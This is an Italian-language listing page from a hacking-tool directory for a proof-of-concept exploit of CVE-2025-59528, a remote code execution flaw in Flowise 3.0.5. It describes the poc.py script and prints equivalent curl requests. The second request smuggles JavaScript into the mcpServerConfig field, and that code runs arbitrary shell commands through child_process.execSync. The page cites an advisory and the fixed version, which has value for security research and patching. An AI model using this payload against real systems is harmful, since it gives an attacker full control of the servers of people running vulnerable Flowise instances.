Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 Prova di concetto | Kitploit
Strumenti/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 Prova di concetto

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-59528 PoC

Script Python proof-of-concept per attivare il percorso RCE CustomMCP di Flowise tramite POST /api/v1/node-load-method/customMCP.

⚠️ Solo a scopo educativo e per ricerca sulla sicurezza autorizzata. Eseguire questo strumento contro sistemi che non possiedi o per i quali non hai il permesso scritto di testare è illegale.

Credit

  • im-soohyun (Kim SooHyun)

Details

  • PoC per CVE-2025-59528
  • Versione interessata: Flowise 3.0.5
  • Versione corretta: Flowise 3.0.6
  • Riferimento: https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

Files

  • poc.py: richiede URL/IP della macchina, protocollo opzionale quando si usa host/IP nudo, email, password e comando; esegue l'accesso, riutilizza i cookie, poi invia una richiesta CustomMCP appositamente costruita e stampa lo stato HTTP, gli header e il corpo della risposta in modo simile a curl -i

Usage

Esegui:

root@kitploit:~
python3 poc.py

Quindi fornisci:

  • URL/IP della macchina, ad esempio 10.10.11.10, http://10.10.11.10 o https://target.example
  • protocollo se richiesto per host/IP senza protocollo
  • indirizzo email
  • password di un account sull'istanza Flowise di destinazione
  • comando da eseguire sul server

Curl equivalente

Prima richiesta

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

Seconda richiesta

root@kitploit:~
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'
Scarica lo strumento